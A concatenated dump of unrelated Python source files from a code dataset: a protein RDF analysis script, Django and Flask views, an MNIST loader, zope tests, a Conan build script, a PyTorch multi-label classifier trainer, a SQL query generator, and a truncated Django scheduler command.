residues.loc[proteins.loc[protname].fasta,'MW'].values\n masses[0] += 2\n masses[-1] += 16\n radii = residues.loc[proteins.loc[protname].fasta,'sigmas'].values/2\n # define topology that includes bead masses to calculate correct center of mass\n top = md.Topology()\n for _ in range(n_chains):\n chain = top.add_chain()\n residue = top.add_residue('C{:d}'.format(chain.index), chain, resSeq=chain.index)\n for i,resname in enumerate(proteins.loc[protname].fasta):\n # add an element with unique name to the dictionary. the letter A is prepended to avoid doubles (e.g. cysteine and carbon)\n element.Element._elements_by_symbol.pop('A'+resname, None)\n el = element.Element.__new__(element.Element, 1, 'A'+resname, 'A'+resname, masses[i], radii[i])\n atom = top.add_atom('A'+resname, element=el, residue=residue)\n for i in range(chain.n_atoms-1):\n top.add_bond(chain.atom(i),chain.atom(i+1))\n \n # load trajectory data \n t = md.load('{:s}/{:s}/run{:d}/{:s}.dcd'.format(protname,ff,run,protname),top=top)\n t = t[66:]\n\n # create trajectory and topology for centers of mass\n cmtop = md.Topology()\n cmpos = []\n for chain in t.top.chains:\n chain = cmtop.add_chain()\n res = cmtop.add_residue('CM', chain, resSeq=chain.index)\n cmtop.add_atom('CM', element=t.top.atom(0).element, residue=res)\n cmpos.append(md.compute_center_of_mass(\n t.atom_slice(t.top.select('chainid {:d}'.format(chain.index)))))\n cmpos = np.swapaxes(np.array(cmpos),0,1)\n cmtraj = md.Trajectory(cmpos, cmtop, t.time, t.unitcell_lengths, t.unitcell_angles)\n # calculate the rdf between the centers of mass\n for k in range(4): # divide each replica into 4 chunks\n b = 29150*k\n e = b+29150\n r,rdf = md.compute_rdf(cmtraj[b:e], [[0,1]], r_range=(0,upper), bin_width = width, periodic=True)\n # save results\n np.savetxt('rdfs/{:s}_{:s}_{:d}_{:d}.dat'.format(protname,ff,run,k),np.c_[r,rdf])\n \ndef concatenated_rdf(protname,n_runs,ff,width,proteins,residues):\n \"\"\"\n Caculate rdf from a single, long trajectory after concatenation \n of several trajectories. The concatenation takes place after\n the center-of-mass trajectories have been constructed.\n The calculation will be performed for the first n_runs trajectories. \n \"\"\"\n \n # define topology that includes bead masses to calculate correct center of mass\n upper = proteins.loc[protname].L / 2\n n_chains = 2\n masses = residues.loc[proteins.loc[protname].fasta,'MW'].values\n masses[0] += 2\n masses[-1] += 16\n radii = residues.loc[proteins.loc[protname].fasta,'sigmas'].values/2\n top = md.Topology()\n for _ in range(n_chains):\n chain = top.add_chain()\n residue = top.add_residue('C{:d}'.format(chain.index), chain, resSeq=chain.index)\n for i,resname in enumerate(proteins.loc[protname].fasta):\n element.Element._elements_by_symbol.pop('A'+resname, None)\n el = element.Element.__new__(element.Element, 1, 'A'+resname, 'A'+resname, masses[i], radii[i])\n atom = top.add_atom('A'+resname, element=el, residue=residue)\n for i in range(chain.n_atoms-1):\n top.add_bond(chain.atom(i),chain.atom(i+1))\n\n cmtrajs = [] \n for run in range(1,n_runs+1):\n # load trajectory data \n t = md.load('{:s}/{:s}/run{:d}/{:s}.dcd'.format(protname,ff,run,protname),top=top)\n t = t[66:]\n # create trajectory and topology for centers of mass\n cmtop = md.Topology()\n cmpos = []\n for chain in t.top.chains:\n chain = cmtop.add_chain()\n res = cmtop.add_residue('CM', chain, resSeq=chain.index)\n cmtop.add_atom('CM', element=t.top.atom(0).element, residue=res)\n cmpos.append(md.compute_center_of_mass(\n t.atom_slice(t.top.select('chainid {:d}'.format(chain.index)))))\n cmpos = np.swapaxes(np.array(cmpos),0,1)\n cmtraj = md.Trajectory(cmpos, cmtop, t.time, t.unitcell_lengths, t.unitcell_angles)\n cmtrajs.append(cmtraj)\n # create pseudo-traj based on all individual trajectories \n pseudo_traj = md.join(cmtrajs)\n # calculate the rdf between the centers of mass\n r,rdf = md.compute_rdf(pseudo_traj, [[0,1]], r_range=(0,upper), bin_width = width, periodic=True)\n # save results\n np.savetxt('rdfs/{:s}_{:s}.dat'.format(protname,ff),np.c_[r,rdf])\n\nparser = ArgumentParser()\nparser.add_argument('--name',dest='name',type=str,required=True)\nparser.add_argument('--ff',dest='ff',type=str,required=True)\nargs = parser.parse_args() \n\nproteins = pd.read_pickle('proteins.pkl')\nresidues = pd.read_pickle('residues.pkl')\nresidues = residues.set_index('one')\n\n# create directory to save files in\nif not os.path.isdir('rdfs'):\n os.mkdir('rdfs')\n\n# calculate individual rdfs for blocks of 875 ns\nfor run in range(1,11):\n individual_rdfs(args.name,run,args.ff,0.1,proteins,residues)\n\n# calculate rdf using data from all trajs\nconcatenated_rdf(args.name,10,args.ff,0.1,proteins,residues)\n","sub_path":"2021/CG-IDPs-Tesei-et-al/two-chain/code/rdf_calc.py","file_name":"rdf_calc.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"417799640","text":"from rest_framework.urlpatterns import format_suffix_patterns\nfrom apps.usuarios import views\nfrom django.urls import path ,include\n\nurlpatterns=[\n\tpath('usuario/', views.UsuarioList.as_view()),\n\tpath('usuario//', views.UsuarioDetail.as_view()),\n\tpath('carrera', views.CarreraList.as_view()),\n\tpath('carrera//', views.CarreraDetail.as_view()),\n\tpath('user', views.UserList.as_view()),\n\tpath('user//', views.UserDetail.as_view()),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"apps/usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"446900802","text":"import os\nimport pandas as pd\nimport numpy as np\n\n\ndef _get_file_dir():\n return os.path.dirname(os.path.realpath(__file__))\n\n\ndef load_mnist_test():\n csv_path = os.path.join(_get_file_dir(), 'test.csv')\n csv = pd.read_csv(csv_path)\n\n return csv.values\n\n\ndef load_mnist_train(labels_encoding='original'):\n \"\"\"\n :param labels_encoding: the encoding used for labels:\n - original: original MNIST values (each label is represented by a integer in the interval 0-9)\n - one-hot: each label is represented by a sparse array containing value 1 only for the correct label.\n example: 4 = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]\n :return: tuple (x, y), where x are the images and y the labels\n \"\"\"\n csv_path = os.path.join(_get_file_dir(), 'train.csv')\n csv = pd.read_csv(csv_path)\n csv_values = csv.values\n\n x = csv_values[:, 1:]\n y = csv_values[:, 0]\n\n if labels_encoding == 'original':\n y_encoded = y\n elif labels_encoding == 'one-hot':\n y_encoded = np.zeros((y.shape[0], 10), dtype=np.float32)\n y_encoded[range(y.shape[0]), y] = 1.0\n else:\n raise ValueError('Invalid value for labels_encoding: %s' % labels_encoding)\n\n return x, y_encoded\n","sub_path":"kaggle/mnist/mnist-tf/datasets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650358464","text":"import unittest\nfrom zope.app.testing import placelesssetup\nimport zope.testing.module\nfrom zope.testing import doctest\nfrom zope.component import testing, eventtesting\nfrom zope.app.container.tests.placelesssetup import PlacelessSetup\n\ncontainer_setup = PlacelessSetup()\n\ndef setUp(test):\n placelesssetup.setUp(test)\n events = test.globs['events'] = []\n import zope.event\n zope.event.subscribers.append(events.append)\n\ndef tearDown(test):\n placelesssetup.tearDown(test)\n events = test.globs.pop('events')\n import zope.event\n assert zope.event.subscribers.pop().__self__ is events\n del events[:] # being paranoid\n\ndef subscribersSetUp(test):\n placelesssetup.setUp(test)\n zope.testing.module.setUp(test, 'zc.freeze.subscribers_txt')\n\ndef subscribersTearDown(test):\n zope.testing.module.tearDown(test)\n placelesssetup.tearDown(test)\n\ndef copierSetUp(test):\n zope.testing.module.setUp(test, 'zc.freeze.copier_txt')\n testing.setUp(test)\n eventtesting.setUp(test)\n container_setup.setUp()\n\ndef copierTearDown(test):\n zope.testing.module.tearDown(test)\n testing.tearDown(test)\n\ndef test_suite():\n tests = (\n doctest.DocFileSuite(\n 'README.txt',\n setUp=setUp, tearDown=tearDown),\n doctest.DocFileSuite(\n 'copier.txt',\n setUp=copierSetUp,\n tearDown=copierTearDown),\n )\n try:\n import zope.locking\n except ImportError:\n pass\n else:\n tests += (\n doctest.DocFileSuite(\n 'subscribers.txt',\n setUp=subscribersSetUp, tearDown=subscribersTearDown,\n optionflags=doctest.INTERPRET_FOOTNOTES),)\n return unittest.TestSuite(tests)\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n","sub_path":"zc.freeze/branches/1.0/src/zc/freeze/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"321771578","text":"import copy\nimport os\nimport cpuid\nimport platform\nfrom kthbuild import get_base_march_ids, get_builder, handle_microarchs, copy_env_vars, filter_valid_exts, filter_marchs_tests\n\nif __name__ == \"__main__\":\n\n builder, name = get_builder(os.path.dirname(os.path.abspath(__file__)))\n builder.add_common_builds()\n\n march_ids = get_base_march_ids()\n filtered_builds = []\n for settings, options, env_vars, build_requires, reference in builder.items:\n\n if settings[\"build_type\"] == \"Release\" \\\n and (not \"compiler.runtime\" in settings or not settings[\"compiler.runtime\"] == \"MD\"):\n\n copy_env_vars(env_vars)\n\n bch = copy.deepcopy(options)\n # btc = copy.deepcopy(options)\n\n bch[\"*:currency\"] = 'BCH'\n # btc[\"*:currency\"] = 'BTC'\n\n bch_rpc_off = copy.deepcopy(bch)\n # bch_rpc_on = copy.deepcopy(bch)\n bch_rpc_off[\"*:rpc\"] = \"False\"\n # bch_rpc_on[\"*:rpc\"] = \"True\"\n\n # # btc_rpc_off = copy.deepcopy(btc)\n # btc_rpc_on = copy.deepcopy(btc)\n # # btc_rpc_off[\"*:rpc\"] = \"False\"\n # btc_rpc_on[\"*:rpc\"] = \"True\"\n\n # # bch_rpc_off_full = copy.deepcopy(bch_rpc_off)\n # bch_rpc_on_full = copy.deepcopy(bch_rpc_on)\n # # bch_rpc_off_full[\"*:db\"] = \"full\"\n # bch_rpc_on_full[\"*:db\"] = \"full\"\n\n # # btc_rpc_off_full = copy.deepcopy(btc_rpc_off)\n # btc_rpc_on_full = copy.deepcopy(btc_rpc_on)\n # # btc_rpc_off_full[\"*:db\"] = \"full\"\n # btc_rpc_on_full[\"*:db\"] = \"full\"\n\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_on, env_vars, build_requires)\n handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_off, env_vars, build_requires)\n\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_on, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, btc_rpc_off, env_vars, build_requires)\n\n # ci_currency = os.getenv('KTH_CI_CURRENCY', None)\n # if ci_currency is not None:\n # options[\"*:currency\"] = ci_currency\n\n # rpc_off = copy.deepcopy(options)\n # rpc_on = copy.deepcopy(options)\n # rpc_off[\"*:rpc\"] = \"False\"\n # rpc_on[\"*:rpc\"] = \"True\"\n\n # rpc_off_full = copy.deepcopy(rpc_off)\n # rpc_on_full = copy.deepcopy(rpc_on)\n # rpc_off_full[\"*:db\"] = \"full\"\n # rpc_on_full[\"*:db\"] = \"full\"\n \n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_on, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, rpc_off, env_vars, build_requires)\n\n\n builder.builds = filtered_builds\n builder.run()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"305940329","text":"import torch.nn as nn\nfrom torch.utils.data import BatchSampler, SequentialSampler, RandomSampler\nfrom utils import *\nimport time\nimport logging\nimport gzip\nimport os\nimport math\nfrom scipy.io.arff import loadarff\nfrom torchviz import make_dot\nimport numpy as np\nfrom torch import optim\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom torchsummary import summary\nfrom torch import nn\nimport torch\nfrom model.net import AttentionModel\nfrom losses import Loss\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.use('Agg')\ntorch.manual_seed(1)\n\ntry:\n import cPickle as thepickle\nexcept ImportError:\n import _pickle as thepickle\n\ntorch.set_default_tensor_type(torch.FloatTensor)\n\n\nclass Solver():\n def __init__(self, model, loss, outdim_size, params, device=torch.device('cpu')):\n self.model = model\n self.model.to(device)\n self.epoch_num = params['epoch_num']\n self.batch_size = params['batch_size']\n self.loss = loss\n self.optimizer = torch.optim.Adam(\n model.parameters(), lr=params['learning_rate'], weight_decay=params['reg_par'])\n self.device = device\n\n self.reg_par = params['reg_par']\n self.outdim_size = outdim_size\n\n formatter = logging.Formatter(\n \"[ %(levelname)s : %(asctime)s ] - %(message)s\")\n logging.basicConfig(\n level=logging.DEBUG, format=\"[ %(levelname)s : %(asctime)s ] - %(message)s\")\n self.logger = logging.getLogger(\"Pytorch\")\n fh = logging.FileHandler(\"XML_rcv.log\")\n fh.setFormatter(formatter)\n self.logger.addHandler(fh)\n\n self.logger.info(self.model)\n self.logger.info(self.optimizer)\n self.start_epoch = 0\n\n def fit(self, X_train, Y_train,\n v_x=None, v_y=None,\n t_x=None, t_y=None,\n checkpoint='', load_model=False):\n \"\"\"\n x1, x2 are the vectors needs to be make correlated\n dim=[batch_size, feats]\n \"\"\"\n X_train = X_train\n Y_train = Y_train\n #tfidf = tfidf\n data_size = X_train.shape[0]\n print(X_train.shape, Y_train.shape)\n if v_x is not None and v_y is not None:\n best_val_loss = None\n v_x\n #v_tfidf\n v_y\n if t_x is not None and t_y is not None:\n t_x\n #t_tfidf\n t_y\n\n if(load_model):\n self.start_epoch, loss = self.load_model(checkpoint)\n\n train_losses = []\n while(self.start_epoch < self.epoch_num):\n epoch_start_time = time.time()\n self.model.train()\n batch_idxs = list(BatchSampler(RandomSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n\n for batch_idx in batch_idxs:\n self.optimizer.zero_grad()\n X_train_b = X_train[batch_idx,:].toarray()\n Y_train_b = Y_train[batch_idx,:].toarray().astype('int')\n #print(X_train_b.shape, Y_train_b.shape)\n #print(X_train_b, Y_train_b)\n batch_X_train_b, tfidf_b, Y_train_b = prepare_tensors_from_data(X_train_b, Y_train_b)\n #print(batch_X_train_b.shape, tfidf_b.shape, Y_train_b.shape)\n batch_tfidf = tfidf_b.to(self.device)\n batch_X_train = batch_X_train_b.to(self.device)\n batch_Y_train = Y_train_b.to(self.device)\n x_hidden, y_hidden, y_predicted = self.model(\n batch_X_train, batch_tfidf, batch_Y_train)\n loss = self.loss(x_hidden, y_hidden,\n y_predicted, batch_Y_train)\n train_losses.append(loss.item())\n loss.backward()\n self.optimizer.step()\n #break\n train_loss = np.mean(train_losses)\n\n info_string = \"Epoch {:d}/{:d} - time: {:.2f} - training_loss: {:.4f}\"\n if v_x is not None and v_y is not None:\n with torch.no_grad():\n self.model.eval()\n val_loss = self.test(v_x, v_y)\n info_string += \" - val_loss: {:.4f}\".format(val_loss)\n if(best_val_loss is None):\n best_val_loss = val_loss\n elif val_loss < best_val_loss:\n self.logger.info(\n \"Epoch {:d}: val_loss improved from {:.4f} to {:.4f}, saving model to {}\".format(self.start_epoch + 1, best_val_loss, val_loss, checkpoint))\n best_val_loss = val_loss\n torch.save({\n 'epoch': self.start_epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss,\n }, checkpoint)\n else:\n self.logger.info(\"Epoch {:d}: val_loss did not improve from {:.4f}\".format(\n self.start_epoch + 1, best_val_loss))\n else:\n torch.save({\n 'epoch': self.start_epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'loss': loss,\n }, checkpoint)\n epoch_time = time.time() - epoch_start_time\n self.logger.info(info_string.format(\n self.start_epoch + 1, self.epoch_num, epoch_time, train_loss))\n self.start_epoch += 1\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(np.array(train_losses), 'r')\n fig.savefig('loss.png')\n\n # fig = plt.figure()\n # plt.plot(np.array(train_losses), 'r')\n # plt.savefig('loss.png')\n # plt.close(fig)\n checkpoint_ = torch.load(checkpoint)['model_state_dict']\n self.model.load_state_dict(checkpoint_)\n if v_x is not None and v_y is not None:\n loss = self.test(v_x, v_y)\n self.logger.info(\"loss on validation data: {:.4f}\".format(loss))\n\n if t_x is not None and t_y is not None:\n loss = self.test(t_x, t_y)\n self.logger.info('loss on test data: {:.4f}'.format(loss))\n\n def test(self, x, y):\n # x = x\n # tfidf = tfidf\n # y = y\n with torch.no_grad():\n self.model.eval()\n data_size = x.shape[0]\n batch_idxs = list(BatchSampler(SequentialSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n losses = []\n for batch_idx in batch_idxs:\n x_b, tfidf_b, y_b = prepare_tensors_from_data(x[batch_idx,:].toarray(), y[batch_idx,:].toarray().astype('int'))\n batch_x1 = x_b.to(self.device)\n batch_tfidf = tfidf_b.to(self.device)\n batch_y = y_b.to(self.device)\n x_hidden, y_hidden, y_predicted = self.model(\n batch_x1, batch_tfidf, batch_y)\n loss = self.loss(x_hidden, y_hidden,\n y_predicted, batch_y)\n losses.append(loss.item())\n #break\n return np.mean(losses)\n\n def load_model(self, path):\n print(\"=> loading checkpoint '{}'\".format(path))\n checkpoint_ = torch.load(path)\n self.model.load_state_dict(checkpoint_['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint_['optimizer_state_dict'])\n start_epoch = int(checkpoint_['epoch'])+1\n loss = checkpoint_['loss']\n return start_epoch, loss\n\n def predict(self, X_test, Y_test):\n # tfidf = tfidf\n # bow = X_test\n with torch.no_grad():\n self.model.eval()\n data_size = X_test.shape[0]\n batch_idxs = list(BatchSampler(SequentialSampler(\n range(data_size)), batch_size=self.batch_size, drop_last=False))\n outputs1 = []\n correct_output = []\n for batch_idx in batch_idxs:\n bow_b, tfidf_b, Y_test_b = prepare_tensors_from_data(X_test[batch_idx,:].toarray(), Y_test[batch_idx,:].toarray().astype('int'))\n batch_x1 = bow_b.to(device)\n batch_tfidf = tfidf_b.to(device)\n o1 = self.model.predict(batch_x1, batch_tfidf)\n outputs1.append(o1)\n correct_output.append(Y_test_b)\n outputs = torch.cat(outputs1, dim=0)\n correct_output = torch.cat(correct_output, dim = 0)\n return outputs\n\n\ndef split_test_val(X, Y):\n indices = np.random.permutation(X.shape[0])\n val_size = int(0.2*X.shape[0])\n val_idx, test_idx = indices[:val_size], indices[val_size:]\n X_val = X[val_idx]\n #tfidf_val = tfidf[val_idx]\n Y_val = Y[val_idx]\n X_test = X[test_idx]\n #tfidf_test = tfidf[test_idx]\n Y_test = Y[test_idx]\n return X_val, Y_val, X_test, Y_test\n\nif __name__ == '__main__':\n\n # wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGU0VTR1pCejFpWjg' -O Eurlex.zip\n # wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGdnEzRWZWQWJMRnc' -O RCV1-x.zip\n # wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=0B3lPMIHmG6vGdG1jZ19VS2NWRVU' -O Delicious.zip\n\n ############\n # Parameters Section\n # mpl_logger = logging.getLogger(\"matplotlib\")\n # mpl_logger.setLevel(logging.INFO)\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"device\", device)\n print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n\n # the size of the new space learned by the model (number of the new features)\n\n ### For mediamill ##\n #input_size = 120\n #output_size = 101\n #embedding_size = 100\n #attention_layer_size = 50\n #encoder_layer_size = 120\n #hidden_layer_size = 80\n\n ### For Delicious ##\n #input_size = 500\n #output_size = 983\n #embedding_size = 100\n #attention_layer_size = 50\n #encoder_layer_size = 120\n #hidden_layer_size = 80\n\n ### For Eurlex ##\n # input_size = 5000\n # output_size = 3993\n # embedding_size = 100\n # attention_layer_size = 25\n # encoder_layer_size = 600\n # hidden_layer_size = 200\n\n ### For RCV ##\n input_size = 47236\n output_size = 2456\n embedding_size = 100\n attention_layer_size = 25\n encoder_layer_size = 600\n hidden_layer_size = 200\n\n # the parameters for training the network\n params = dict()\n params['learning_rate'] = 1e-3\n params['epoch_num'] = 100\n if(len(sys.argv) > 1):\n params['epoch_num'] = int(sys.argv[1])\n params['batch_size'] = 64\n params['reg_par'] = 1e-5\n\n # the regularization parameter of the network\n # seems necessary to avoid the gradient exploding especially when non-saturating activations are used\n r1 = 5e-7\n m = 0.6\n lamda = 100\n # specifies if all the singular values should get used to calculate the correlation or just the top outdim_size ones\n # if one option does not work for a network or dataset, try the other one\n use_all_singular_values = False\n\n # end of parameters section\n\n ########### Mediamill/Delicious ###########\n #X_train, Y_train, X_test, Y_test = load_small_data(\n # full_data_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/Mediamill_data.txt\",\n # tr_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/mediamill_trSplit.txt\",\n # tst_path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Mediamill/mediamill_trSplit.txt\"\n # )\n #X_train, Y_train, X_test, Y_test = load_small_data(\n # full_data_path=\"/home/praveen.balireddy/XML/datasets/Delicious/Delicious_data.txt\",\n # tr_path=\"/home/praveen.balireddy/XML/datasets/Delicious/delicious_trSplit.txt\",\n # tst_path=\"/home/praveen.balireddy/XML/datasets/Delicious/delicious_tstSplit.txt\"\n # )\n ########### Eurlex-4k ###########\n # X_train, Y_train = load_data(\n # path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Eurlex/eurlex_train.txt\", isTxt=True)\n # X_test, Y_test = load_data(\n # path=\"/home/praveen/Desktop/iiith-assignments/ExtremeClassification/Eurlex/eurlex_test.txt\", isTxt=True)\n # X_train, Y_train = load_data(\n # path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_train.txt\", isTxt=True)\n # X_test, Y_test = load_data(\n # path = \"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_test.txt\", isTxt = True)\n\n ########### RCV ###########\n X_train, Y_train=load_rcv_data(\n path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_train.txt\")\n X_test, Y_test=load_rcv_data(\n path=\"/home/praveen.balireddy/XML/datasets/RCV1-x/rcv1x_test.txt\")\n\n ### Common code from here #########\n #X_train, train_tfidf, Y_train = prepare_tensors_from_data(X_train, Y_train)\n #X_test, test_tfidf, Y_test = prepare_tensors_from_data(X_test, Y_test)\n X_val, Y_val, _, _ = split_test_val(\n X_test, Y_test)\n # Building, training, and producing the new features by DCCA\n model = AttentionModel(input_size=input_size, embedding_size=embedding_size,\n attention_layer_size=attention_layer_size, encoder_layer_size=encoder_layer_size,\n hidden_layer_size=hidden_layer_size, output_size=output_size).to(device)\n # print(sum(p.numel() for p in model.parameters() if p.requires_grad))\n loss_func = Loss(outdim_size=hidden_layer_size, use_all_singular_values=use_all_singular_values,\n device=device, r1=r1, m=m, lamda=lamda).loss\n solver = Solver(model=model, loss=loss_func,\n outdim_size=output_size, params=params, device=device)\n check_path = \"/home/praveen.balireddy/XML/checkpoints/checkpoint_rcv.model\"\n # check_path = \"./checkpoint.model\"\n solver.fit(X_train, Y_train, X_val, Y_val, checkpoint=check_path, load_model=False)\n y_pred, Y_test = solver.predict(X_test, Y_test)\n y_pred = to_numpy(y_pred)\n Y_test = to_numpy(Y_test)\n #print(y_pred)\n #print(Y_test)\n print(\"#########################\")\n print(\"P@1: \", p_k(y_pred, Y_test, 1))\n print(\"P@3: \", p_k(y_pred, Y_test, 3))\n print(\"P@5: \", p_k(y_pred, Y_test, 5))\n print(\"#########################\")\n print(\"n@1: \", n_k(y_pred, Y_test, 1))\n print(\"n@3: \", n_k(y_pred, Y_test, 3))\n print(\"n@5: \", n_k(y_pred, Y_test, 5))\n d = torch.load(check_path)\n solver.model.load_state_dict(d['model_state_dict'])\n solver.model.parameters()\n","sub_path":"main_rcv.py","file_name":"main_rcv.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272787619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefines views.\n\"\"\"\n# pylint: disable=unused-wildcard-import, wildcard-import\nimport calendar\nimport logging\nfrom flask import redirect, abort, render_template\nfrom jinja2 import TemplateNotFound\n\nfrom presence_analyzer.main import app\nfrom presence_analyzer import utils\n\nlog = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\n@app.route('/')\ndef mainpage():\n \"\"\"\n Redirects to front page.\n \"\"\"\n return redirect('/presence_weekday.html')\n\n\n@app.route('/api/v1/users', methods=['GET'])\n@utils.jsonify\ndef users_view():\n \"\"\"\n Users listing for dropdown.\n \"\"\"\n data = utils.get_xml_data()\n\n return [\n {'user_id': i, 'name': data[i]['name']}\n for i in data.keys()\n ]\n\n\n@app.route('/api/v1/mean_time_weekday/', methods=['GET'])\n@utils.jsonify\ndef mean_time_weekday_view(user_id):\n \"\"\"\n Returns mean presence time of given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.group_by_weekday(data[user_id])\n result = [\n (calendar.day_abbr[weekday], utils.mean(intervals))\n for weekday, intervals in enumerate(weekdays)\n ]\n\n return result\n\n\n@app.route('/api/v1/presence_weekday/', methods=['GET'])\n@utils.jsonify\ndef presence_weekday_view(user_id):\n \"\"\"\n Returns total presence time of given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.group_by_weekday(data[user_id])\n result = [\n (calendar.day_abbr[weekday], sum(intervals))\n for weekday, intervals in enumerate(weekdays)\n ]\n\n result.insert(0, ('Weekday', 'Presence (s)'))\n return result\n\n\n@app.route('/api/v1/presence_start_end/', methods=['GET'])\n@utils.jsonify\ndef presence_start_end(user_id):\n \"\"\"\n Return presence mean start and end times for given user grouped by weekday.\n \"\"\"\n data = utils.get_data()\n if user_id not in data:\n log.debug('User %s not found!', user_id)\n abort(404)\n\n weekdays = utils.mean_start_stop(data[user_id])\n result = [\n (calendar.day_abbr[weekday], day['Start'], day['End'])\n for weekday, day in enumerate(weekdays)\n ]\n return result\n\n\n@app.route('/', methods=['GET'])\ndef render_all(temp_name):\n \"\"\"\n Render templates.\n \"\"\"\n try:\n return render_template(temp_name, selected=temp_name)\n except TemplateNotFound:\n return render_template('notFound.html')\n\n\n@app.route('/api/v1/user_avatar/', methods=['GET'])\n@utils.jsonify\ndef user_avatar(user_id):\n \"\"\"\n Return path to users avatar.\n \"\"\"\n data = utils.get_xml_data()\n user_id = str(user_id)\n return data[user_id]['avatar']\n","sub_path":"src/presence_analyzer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464896960","text":"#!/usr/bin/python2.4\n#\n# Small script to show PostgreSQL and Pyscopg together\n#\nimport sys\nsys.path.append(\"..\")\nfrom common import randop\n\n\ndef create_sql_in_withindex():\n name = randop.create_random_string(6)\n sql = \"SELECT * from COMPANY where id IN (SELECT id FROM CORP where name = 'Paul')\"\n return sql\n\ndef create_sql_in_noindex():\n rowkey = randop.create_random_int(1, 10000)\n sql = \"SELECT * from COMPANY where age IN (SELECT age FROM CORP where id < %d )\"%rowkey\n return sql\n\ndef create_sql_in_noanyindex():\n name = randop.create_random_string(6)\n sql = \"SELECT * from COMPANY where age IN (SELECT age FROM CORP where name = 'Paul')\"\n return sql\n######################################\n# Test #\n######################################\nif __name__ == '__main__':\n a = create_sql_in_withindex()\n print (a)\n","sub_path":"old/old_test_modules/_old/sql/IN.py","file_name":"IN.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353183243","text":"import logging\n\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\n\nfrom blogapp.models import *\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\n\n\nimport datetime\n\nlogger = logging.getLogger(__name__)\n\n\n# наша задача по выводу текста на экран\ndef my_job():\n # Your job processing logic here...\n print('hello from job')\n\n\ndef send_letters_to_subscribers():\n categories = Category.objects.all()\n emails = []\n\n for cat in categories:\n cat_subscribers = list(User.objects.filter(categories=cat))\n if cat_subscribers:\n for user in cat_subscribers:\n if user not in emails:\n\n date = datetime.date.today() - datetime.timedelta(days=7)\n posts = 